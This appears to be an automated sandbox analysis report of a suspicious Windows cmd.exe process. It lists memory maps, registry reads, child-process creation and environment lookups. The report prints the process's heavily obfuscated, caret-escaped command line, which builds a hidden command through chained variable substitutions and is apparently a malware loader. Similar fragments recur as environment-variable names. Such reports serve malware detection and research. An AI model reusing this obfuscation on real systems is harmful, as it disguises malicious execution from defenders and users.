private_0x00000000004a0000 0x004a0000 0x004affff Private Memory rw True False False -
pagefile_0x00000000004b0000 0x004b0000 0x00637fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000640000 0x00640000 0x007c0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000007d0000 0x007d0000 0x01bcffff Pagefile Backed Memory r True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
find.exe 0xffdc0000 0xffdc7fff Memory Mapped File rwx False False False -
ulib.dll 0x7fee56b0000 0x7fee56d7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
advapi32.dll 0x7feff0e0000 0x7feff1bafff Memory Mapped File rwx False False False -
sechost.dll 0x7feff1c0000 0x7feff1defff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7feffc50000 0x7feffd7cfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffd3000 0x7fffffd3000 0x7fffffd3fff Private Memory rw True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory rw True False False -
Process #7: cmd.exe
205 0
Information Value
ID #7
File Name c:\windows\system32\cmd.exe
Command Line Cmd , ; ; ; pPuxarv/VCsv40blbkn , cw8f/r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^:^H^4^a^x^i^y+^F^3^p^bf^b^f^k^7^y^u^u^Qe^7P^jy^6K^1^{^m^6^G^C7y^%^z^w^L^h^P^j^y^8^ ^8^ 
z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^:^j^Unb^f^)-^3^Qe^AC^X^]^2^+2^1^F^3^p^b^f^b^f^k^7^y^u^uQ^e^G^C^7^y2^+2^G^C^7^y^'^6^w^L^.^Y^-^3^Q^e^A^C^6n^37^.Y^j^Un^5^)^)^}^2^+^2^}[^2^+2^e^2^+^2^w^L^Xb^1^2^+^2^{^jh^`^e^o2G^C7^y^2^+2^8^P^m^'^%^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^%^R^en^6^w^L^P^jy^{^7^y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^%^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^%^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^%z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^%R^en6w^L^P^j^y^{^7^y^jU^6^%^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^%^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^%^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^%^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^%^R^en^6^w^L^P^j^y^{^7^y^j^U6^%^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^%.^Y^.^Y^6^j^U^e/`^6^K^w^L^,^%^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^:^X^b^G^C7^y^)^'^7y6^T^d^vw^L^'^enF^3p^b^f^P^j^Q^e^wL7^y^j^U^6^X^m^u^Q^e^6n^jU^'^eq^F^3p^b^fN^7^y^P^j^Q^e^8^P^e^o^2^7^yj^U^6^R^Z^G^C^7^y^y^%^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^%^w^L^]^6^7^y^j^U^6^%^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^%^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^%e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ 
^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^%^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^:A^C^=^9^!) ; ; ; ) )&& ( , (, (^s^e^T ^ ^ ^ ^`^?=^!^\^,^}^_^:^e^o^2^=^s^!) , , ) ; ; )&&( , ( ; ; (S^e^T ^ ^@^[^~=!^`^?:^e^=^I^!) , ) , )&( , , , (^S^e^T ^ ^ ^ ^@^+^*=^!^@^[^~^:^.^=^g^!) , )&& ( (s^E^T ^ ^[^{=^!^@^+^*^:^8^P^=e^!), )& ( ; ; ; (^S^e^T ^ ^{^@^}=^!^[^{^:'^=.^!), , , )& ( ; (^s^E^t ^ ^\^{=^!^{^@^}^:^2^=^'^!) , )&& ( , ; , ( , ; , ; , (^s^E^T ^}^]^,^$=^!^\^{^:^a^=^W^!) , ) , , )&& (^s^e^T ^\^[=^!^}^]^,^$^:^6^=^a^!)&& ( ( ; ; ; (s^e^t ^ ^ ^`^]^$=^!^\^[^:^4^W^x^=^2^!) ) )&& ( , ; , ;, (^S^e^T ^ ^ ^`^-^$=!^`^]^$:bf=^6!) , ; , ; , )& ( ,(,;,; , (^s^ET ^ ^ [^$^@^+=^!^`^-^$^:^7^K^=^A^!) , ) , ;, )& ( , (^S^e^t ^@^-=^!^[^$^@^+:^3^p=^l^!) ; ; ; )& (^S^et ^ ^ ^ ^~^`^*^?=^!^@^-^:^:^=^*^!)&&( , , (^s^e^t ^#^;=^!^~^`^*^?^:^w^L^=^E^!) ,; , ; , )& ( ( , , (^s^e^T ^ ^*^{^[=^!^#^;:^ ^=^0^!) , ) )& (^s^et ^ ^@^#^?^.=^!^*^{^[^:^g^Y^=^ ^!)&( , ( , , (^S^E^T ^ ^'^}^_^-=^!^@^#^?^.^:^8^0^=^:^!) ; ; ) )&&( , ( , (^s^e^t ^ ^ ^;^]=^!^'^}^_^-^:^j^U=^D^!) ) , )&( ; (^s^e^T ^ ^ ^`^\^+=^!^;^]^:^,^=^c^!) ; ; )&&( , ( , (S^e^T ^_^@^.^-=^!^`^\^+:^i^y^=^8^!) , , ) , , )&(^S^e^t ^ ^ ^ ^$^'=^
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:42, Reason: Child Process
Unmonitor End Time: 00:02:06, Reason: Self Terminated
Monitor Duration 00:00:24
OS Process Information
Information Value
PID 0xb04
Parent PID 0xac0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB08
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory rw True False False -
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory r True False False -
locale.nls 0x00150000 0x001b6fff Memory Mapped File r False False False -
pagefile_0x00000000001c0000 0x001c0000 0x001c6fff Pagefile Backed Memory r True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory rw True False False -
private_0x00000000001e0000 0x001e0000 0x002dffff Private Memory rw True False False -
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory rw True False False -
pagefile_0x00000000003e0000 0x003e0000 0x00567fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000570000 0x00570000 0x006f0fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000700000 0x00700000 0x01afffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001b00000 0x01b00000 0x01b01fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000001b10000 0x01b10000 0x01e52fff Pagefile Backed Memory r True False False -
private_0x0000000001e60000 0x01e60000 0x01e60fff Private Memory rw True False False -
private_0x0000000001e70000 0x01e70000 0x01e70fff Private Memory rw True False False -
private_0x0000000001e80000 0x01e80000 0x01f7ffff Private Memory rw True False False -
private_0x0000000001f80000 0x01f80000 0x0217ffff Private Memory rw True False False -
sortdefault.nls 0x02180000 0x0244efff Memory Mapped File r False False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (54)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 9
Fn
Open STD_OUTPUT_HANDLE - True 32
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Write STD_OUTPUT_HANDLE size = 2 True 3
Fn
Data
Write STD_OUTPUT_HANDLE size = 26 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 1 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 4 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 13 True 1
Fn
Data
Write STD_OUTPUT_HANDLE size = 3 True 3
Fn
Data
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (3)
Operation Process Additional Information Success Count Logfile
Create cmd.exe - True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0xb3c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0xb44, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:14 (UTC) True 1
Fn
Get Time type = Ticks, time = 139917 True 1
Fn
Environment (119)
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 3
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 4
Fn
Get Environment String name = PROMPT, result_out = $P$G True 2
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = ^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^ False 1
Fn
Get Environment String name = ^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^ False 1
Fn
Get Environment String name = ^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^ False 1
Fn
Get Environment String name = ^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ ^'^'^H^2^+^2^4^a^x^(^2^+^2^)^)\^F^3pb^f^b^f^k^7^yu^u^Q^e^2^+^2G^C^7^y^2^+^2^G^C^7^y^6^K^F^3^p^b^fb^f^k^7^y^u^u^Q^e^3^7e^o^2^'^6^wL^8^P^2^+^2^G^C^7^y^G^C^7^yy^Z^7^8^P^3p^1^F^3pb^fb^f^k^7^y^u^u^Q^e^7^6^x^d^2^+^2^F^3^p^b^f^2^+^2^b^f^k^7^y^uu^Q^e_^2^+^2^)[^F^3^p^bf^b^f^k^7^y^u^u^Q^e^m^Qe^2^+^2^{F^3^p^b^f^b^f^k^7^yu^u^Q^e^2+^2^_^ False 1
Fn
Get Environment String name = ^z^w^L^h^P^j^y^8^ ^8^ z^w^L^h^2^+^2^3^p^X^2^+^2^X^]^1^1^F^3pb^f^b^f^2^+^2^k^7^y^u^uQ^e^G^C^7^y^G^C^7^y^'^u^-^3^Q^e^A^C^6n^3^7^j^Un^5^)^ False 1
Fn
Get Environment String name = ^8^P^7^2^+^2G^C^7^y^'^w^L2^+^2n^,^X^3^7Zn^2^+^2^.^2^+^2^Pjy^8^ ^8^ ^7^Kj^h^7^y^j^U^6^ee^'^2^+^2^6^w^L8^P^G^C^7^y^j^h^2+^2GC^7^y^]^Zn^.^1^F3^p^b^f^b^f2^+^2^k^7^y^u^u^Q^e^2^+^2m^Q^e^{^ ^'^2^+^2^'^2+^2^j^Un^2^+^2^A^C^ ^(2^+^2^P^j^y^)2^+^2^)^2^)^'^R^8^P^k^7^y3p^6^7^y^j^U^6w^L^1^2^A^C^6^7^2^6^x^d^{^e^o^2^ False 1
Fn
Get Environment String name = ^R^en^6^w^L^P^jy^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^Lh^7^K^]^P^j^y^#^H^)^'^R8^Pk^7^y^3^p^6^7^y^j^U^6^w^L^1^1^{^7y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^Lh^7^K^]^P^j^y^A^Ci^y^+^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^zw^L^h7^K]P^j^yi^y^#+^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = z^w^L^h7^K^]^P^jy^j^Un^ ^b^f^)^6^x^d^{^e^o^2^ False 1
Fn
Get Environment String name = R^en6w^L^P^j^y^{^7^y^jU^6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]P^j^y^jUn^4^a^x^H^)^'^R^8P^k^7^y^3p^6^7^y^j^U^6^wL1^1^{^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]^P^j^y^j^Un^j^Un^i^y^+{^7y^j^U6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]^P^j^y^5^H^+^{7y^j^U^6^ False 1
Fn
Get Environment String name = ^z^w^L^h^7^K^]^Pjy^i^y^j^Un^)^6x^d^{^e^o^2^ False 1
Fn
Get Environment String name = ^R^en^6^w^L^P^j^y^{^7^y^j^U6^ False 1
Fn
Get Environment String name = ^z^wL^h^7^K^]^P^jy^#^bf^)^)^^^&^^^&^.^Y^e^o^28^P^ False 1
Fn
Get Environment String name = .^Y^.^Y^6^j^U^e/`^6^K^w^L^,^ False 1
Fn
Get Environment String name = ^zw^L^h^Pj^.^Y^1^.^Z^.^Y^F^3p^b^f^6^Re^7^K^3^Q^e^A^C^3^p^8^P^8^ ^8^P^ False 1
Fn
Get Environment String name = ^1^1T^d^j^h^.^Y^8^P^qF^3^pb^fN^7^y^8 ^e^o^2^3^T^d^]^7^y^)^'^F^3^pb^f^6^Td^3^8P.^Y^.^Y^)^.^Y.^Y^^^^^^^|^G^C7^y^y^P^j^4^w^L^R^e^o^2^h8^P^Z7^y^w^L^3^p^T^d^.^Y^.^Y^-n^X^q^F^3^p^b^fN^Z^q^F^3^p^b^fN^ False 1
Fn
Get Environment String name = ^w^L^]^6^7^y^j^U^6^ False 1
Fn
Get Environment String name = ^e^.^Y^.^Y^-^q^F^3^p^b^fNX^3^p^P^j^.Y^-^4^Z^qF^3^p^b^fN^.^Y^ False 1
Fn
Get Environment String name = ^z^w^Lh^e^3^7^3^78^Pn^.^Y^-^8^P^7^8^P^,^v^ False 1
Fn
Get Environment String name = e^P^j^q^F^3^pb^fN^k^7^y^P^jT^d^e,^.^Y^3^Q^e^A^C^`^GC^7^yy^7K^j^h^j^h^.^Y^.^Y^-n^P^j^G^C^7^y^y^]P^jz^w^Lh^e^3^p^8^P^.Y^.^Y^-^7^y^j^U^6P^j^m^u^Q^e^7^K^q^F^3^pb^fN^3^7^.^Y^.^Y.Y^.^Y^.^Y^^^^^^^^^^^^^^^&^1^.^Y^@^8^P^q^F^3^p^b^fN^7^y^8^ ^7^y^j^U6X^m^e^o^2^G^C^7^y^y^8^P^,^{^H^6^x^d^4^a^xH^6^x^d^4^a^x^5^P^j^y^-^Td^Q^X^en^22^)^1^@^Zn^k7y^v^ False 1
Fn
Get Environment String name = ^.^Y^)^.^Y^.^Y^^^&^^^&^.^Y^.^Y^,^m3^7^'^8^P^7^w^L.^Y^.^Y^.^Y^,^.^,^.^Y^o^63^7^Z^/^T^.^o) , ) ; ; ; )&( ; ( ; ; ; (^S^e^t ^\^,^}_=^!^+^~^}^{^ False 1
Fn
Get Environment String name = ^=^T!)&& (, ; , ;, ( , ; , (^S^e^T ^ ^ ^ ^}^\=^!^[^$^#^?^ False 1
Fn
Get Environment String name = ^!) , )&& ( , (^S^e^t ^ ^ ^*^}=^!^*^.^@^ False 1
Fn
Get Environment String name = ^g; ; , ^iN , ( ,'; ; ^^ft^^Y^^p^^e ;; , ^|, , ^^f^^iN^^d^^S^^t^^r ;^^c^^m '; ,) , ; ^d^o, , ;; ; (^e^c^h^O , False 1
Fn
Get Environment String name = ^*^[^-^, False 1
Fn
Get Environment String name = | False 1
Fn
